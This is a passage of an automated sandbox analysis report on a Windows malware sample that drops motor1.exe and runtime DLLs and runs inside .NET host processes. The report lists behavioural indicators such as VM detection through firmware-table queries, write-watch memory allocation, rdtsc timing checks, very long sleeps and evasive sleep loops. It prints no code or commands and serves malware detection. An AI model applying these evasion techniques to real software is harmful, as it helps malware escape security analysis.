Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\SystemRootDoc\motor1.exe	System information queried: FirmwareTableInformation

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: 22D60E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 14F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 30E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 14F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: B80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 28B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1380000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2E80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4E80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: F00000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 28B0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 48B0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 17F0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 3310000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 5310000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: DE0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2A00000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2900000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1080000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2A30000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1080000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1900000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 32B0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 52B0000 memory reserve \| memory write watch
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: 2144D270000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1470000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2D80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4D80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2D60000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4D60000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2C10000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 29E0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1180000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2E30000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 13D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2DC0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2F60000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4F60000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 12B0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2C40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4C40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 10B0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1210000 memory reserve \| memory write watch

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

Code function: 4_2_00007FFD93B71380 rdtsc

4_2_00007FFD93B71380

Contains long sleeps (>= 3 min)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 465	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 5235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 4537	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\vcomp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\msvcp140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\vcomp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_atomic_wait.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\concrt140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\msvcp140_2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\msvcp140_atomic_wait.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\concrt140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Dropped PE file which has not been started: C:\Users\user\SystemRootDoc\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	API coverage: 4.1 %
Source: C:\Users\user\SystemRootDoc\motor1.exe	API coverage: 5.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1912	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1912	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5948	Thread sleep count: 5235 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5948	Thread sleep count: 4537 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 420	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5588	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5936	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3928	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2740	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1832	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 420	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3404	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1944	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 352	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2032	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\SystemRootDoc\motor1.exe

Last function: Thread delayed

